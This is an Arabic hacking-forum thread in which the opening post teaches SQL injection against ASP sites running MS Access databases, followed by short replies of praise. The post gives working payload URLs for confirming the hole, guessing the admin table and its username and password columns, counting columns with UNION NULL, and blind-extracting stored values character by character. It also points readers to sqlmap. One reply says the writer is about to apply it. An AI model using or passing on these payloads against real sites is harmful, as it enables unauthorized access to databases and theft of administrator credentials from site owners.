حالة الموضوع:
مغلق
  1. Murtadha Albejawe

    Murtadha Albejawe Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    78
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    $$$
    :{7}: السلام عليكم ورحمة الله وبركاته :{7}:

    اليوم راح نشرح بإذن الله حقن الـ MS ACCESS

    انا لست خبير في هذا النوع من حقن قواعد البيانات ولكن سوف افيدكم ببعض الطرق من خلال تجاربي
    :{21}:

    نبدا ..

    الموقع المصاب :


    [NOTE]http://site.com/index.asp?id=1[/NOTE]


    طبعا نضيف ( ' ) للتاكد من انه مصاب ..

    [​IMG]

    نتاكد من انها ليست وهمية او خطأ ..


    [INFO]http://site.com/index.asp?id=1 and 1=1
    http://site.com/index.asp?id=1 and 1>1
    http://site.com/index.asp?id=1 and 1=2[/INFO]


    تمام شغاله .. خلينا نبلش بالحقن i:q4^:


    [WARNING]http://site.com/index.asp?id=1 union select 1 from random.randomtable[/WARNING]


    سيساعدنا هذا الامر لمعرفة مسار تنصيب قواعد الـ ACCESS

    [​IMG]

    الآن يمكننا أن نبدأ عن طريق فحص وجود أي مسارات محرك أقراص آخر ..





    [INFO]http://site.com/index.asp?id=1 and 0=(select count(*) from N:\.a)[/INFO]


    قم بتغيير " N " الى أي حرف تريد ان تبحث عنه ( رمز البارتشن )

    ويستحسن قرائة الـ errors بدقة وتركيز لكي تصل الى مبتغاك

    لان الاخطاء هي تساعدك في اشياء كثير

    راح اشرحلكم نبذه بسيطه وسريعه عن قرائة الاخطاء وتفسيرها والاستفادة منها

    اذا جانا خطأ يقول " not a valid path "

    معناها انه غير موجود

    [​IMG]

    واذا جانا خطأ بهالشكل " can’t find file "

    هذا معناه إن البارتشن ( الدرايف ) موجود وعلى هيئة data drive

    وأما اذا جا بهالشكل " disk or network error "

    معناه أن البارتشن هذا لمساحة تخزينية أو سيدي او إي شيء من هالنوع ..

    ف عليك ان تجرب وتخمن ، والخيارات المٌمكنة تتكون من : A-Z

    كما MS-ACCESS لا يوجد بيها information schema ،، أذا عليك ان تقوم بالتخمين في حالة اصدار القاعدة = 4

    MySQL => 4

    ألـ syntax structure تكون مشابهه للأتي :


    كود:
    http://site.com/index.asp?id=[COLOR=#8b0000]1 and 0<=(select count(*) from [N]) and 1=1[/COLOR]

    ملآحظة : تقوم بتغيير حرف " N " الى اسم الجدول الي عملت فحص عليه

    اذا طلعلك true فـ معناها إن الجدول موجود والان نذهب للمرحلة البعدها ..

    أذا كان بامكانك اتمام هذا الجزء وفهمه جيدا فـ أنا اقترح عليكم تجربة أداة SQLMAP

    كـ أفضل اداة في هالمجال ..

    طيب خلونا نكمل ،

    نحاول الان حقن الموقع ونحاول نخمن جدول الادمن :


    كود:
    http://site.com/index.asp?id=[COLOR=#8b0000]1 and 0<=(select count(*) from [admin]) and 1=1[/COLOR]

    طيب طلع معاي هالناتج

    FALSE: can’t find input table or query "admin"s

    طيب نجرب نغير جدول الادمن ..


    كود:
    http://site.com/index.asp?id=[COLOR=#8b0000]1 and 0<=(select count(*) from [tbllogin]) and 1=1[/COLOR]

    تمااااااام

    TRUE: Page refreshes like normal, indicating table exists in the database
    (which is actually a file in Access’ case: filedb.mdb)
    TABLE: tbllogin

    اذا هنا حصلنا على جدول الادمن .. نحاول وبنفس الطريقه الحصول على الاعمدة

    وذلك عن طريق التلاعب في اوامر الحقن نخليها هكذا ..


    كود:
    http://site.com/index.asp?id=1 [COLOR=#8b0000]and 0<=(select count([N]) from [TableName]) and 1=1[/COLOR]

    عليك الان بتغيير TableName الى الاسم العمود فوق اسم الجدول tbllogin

    وأيضا غيير N الى الاعمدة الموجوده

    وسوف يقوم الموقع بالعمل على نفس الجداول الموجوده في اوامر الحقن

    واذا كان الاستغلال صحيح والاسماء مضبوطة ف سوف يقوم بعمل ريفرش للموقع ويٌستعرض مع عدم وجود اخطاء

    مجرد قم بالتخمين مضبوط

    في هذا المثال انا وجدت االاعمدة : id, username, password

    [​IMG]

    تماام الان نرجع قليلا الى الخلف مقارنة بالاساليب والطرق الاخرى ..

    كما هو الحال الآن نحن بحاجة لتحديد عدد الأعمدة للجدول وبعد ذلك يمكننا استخراجه

    إذا لم نتمكن من تحديد الاعمدة سوف نلتجيء الى اساليب اخرى وطرق الحقن الاعمى (blind injection)

    لتحديد عدد الأعمدة لجدول مٌعين يمكنك أن تجرب هالآمر ..

    سوف نستخدم الـ NULL Byte في الحقن بدلا من الارقام لمنع ظهور الاخطاء في الاستغلال



    [INFO]http://site.com/index.asp?id=1 union all select null from [TableName]
    http://site.com/index.asp?id=1 union all select null,null from [TableName][/INFO]


    %2bchr(72)%2bchr(82) = +H+R

    تبقا بوضع هذه في جميع عدد الاعمدة حتى يظهر لنا العمود المصاب

    اذا ظهر لنا رقم عمود نستطيع استخدامه في استخراج بيانات تنفعنا

    وفي حالة ماتنجح معنا نظطر لـ استخدام الحقن الاعمى لاستخراج هذه البيانات

    من خلال تجربتي هذه هي الطريقة المستخدمة في معظم الوقت

    راح نحاول نطلع عدد الصفوف ( rows )

    بمجرد اختبارنا للقيمة العددية النتائج تفسر :


    كود:
    http://site.com/index.asp?id=1 [COLOR=#8b0000]and Len((select Count(*) from [TableName]))=<num>[/COLOR]

    طبعا هالامر يفيدنا في معرفة عدد الارقام الموجوده في TableName


    [​IMG]

    نستخدم هالامر ايضا لمعرفة طوله


    كود:
    http://site.com/index.asp?id=1 [COLOR=#8b0000]and asc(mid((Select Count(*) from [TableName]),1,1)=<num>[/COLOR]

    كود:
    http://site.com/index.asp?id=1  [COLOR=#8b0000]and Len((select top 1 [ColumnName] from (select top 1 * from (select  top 1 * from [TableName] order by 1) t order by 1  desc)t))=<num>[/COLOR]

    TRUE

    [​IMG]

    FALSE

    [​IMG]

    نسحب كل الاحرف ونحولها لقيمة CHAR لنقراها بوضوح

    وراح تستخدم "<",">" & "=" في معرفة ما اذا كان الناتج TRUE ولا FALSE

    ونستخدم هالامر


    كود:
    http://site.com/index.asp?id=1  [COLOR=#8b0000]and asc(mid((select top 1 [ColumnName] from (select top 1 * from  (select top 1 * from [TableName] order by 1) t order by 1  desc)t),N,1))=<char>[/COLOR]
    وهذا كل ما اعرفه عن هذا النوع من حقن القواعد :!."​

    يعني احتمال تلاقو اخطاء واحتمال اكون ناسي اشياء مع العلم اني استعانيت بكتب ومراجع كثير وجمعت ايضا بعض الاوامر من مدونات رائعه وحاولت افيدكم بالي اعرفه
    &:"

    وانت تابعو التحديثات الجديده لغرض الاستفاده بالخبره مو اكثر
    )A:"

    تحياتي للجميع.
    &:":



     
  2. !Hackon!

    !Hackon! Developer

    الأنتساب:
    ‏14 مارس 2012
    المشاركات:
    59
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    Hacking
    الإقامة:
    لــبــنــان
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    وعليكم السلام


    وربي موضوع ابداع


    :{4}:​
     
  3. saico

    saico DeveloPer Plus

    الأنتساب:
    ‏21 سبتمبر 2011
    المشاركات:
    45
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    تسلم يا غالى

    جـــــــاري التطبيقi:q2^: ​
     
  4. LiON H34RT

    LiON H34RT Developer

    الأنتساب:
    ‏30 سبتمبر 2012
    المشاركات:
    2
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    S3curity & Hack
    الإقامة:
    S3curity & Hack
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    يعطيك العافية اخي الكريم ..
    ابدعت فاتقنت العمل ..
    الف تحية لك يالغالي ..​
     
  5. αЗѕαя

    αЗѕαя DeveloPer Plus

    الأنتساب:
    ‏15 ديسمبر 2011
    المشاركات:
    152
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الإقامة:
    بلاد الحرمين الشريفين
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    بارك الله فيك اخي الحبيب فعلا موضوع جبار بامتياز




    الله يعينك في حياتك العملية و الشخصية يارب &:":​
     
  6. Dr.aL-jArH

    Dr.aL-jArH DeveloPer Plus

    الأنتساب:
    ‏24 أغسطس 2012
    المشاركات:
    140
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    بارك الله فيك

    )5:"
     
  7. هكر تعبان

    هكر تعبان Developer

    الأنتساب:
    ‏18 يناير 2013
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    الله يوفقك أخوي

    موضوع روعه ​
     
  8. مجنون الاختراقات

    مجنون الاختراقات Developer

    الأنتساب:
    ‏15 يوليو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    .. [ KSA ]..
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    يع ـطيك الف عافيهَِ , $:"​
     
  9. خيال الروحـ

    خيال الروحـ Developer

    الأنتساب:
    ‏24 نوفمبر 2012
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    تسلم ايدك ​
     
  10. الشبح الدموي

    الشبح الدموي Developer

    الأنتساب:
    ‏26 نوفمبر 2012
    المشاركات:
    48
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    LoCaLhOsT
    رد: حصريآ على شبكة عراق تيم حقن قواعد msaccess على طريقتي الخاصه

    جزاك الله خيرآ

    &:":
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة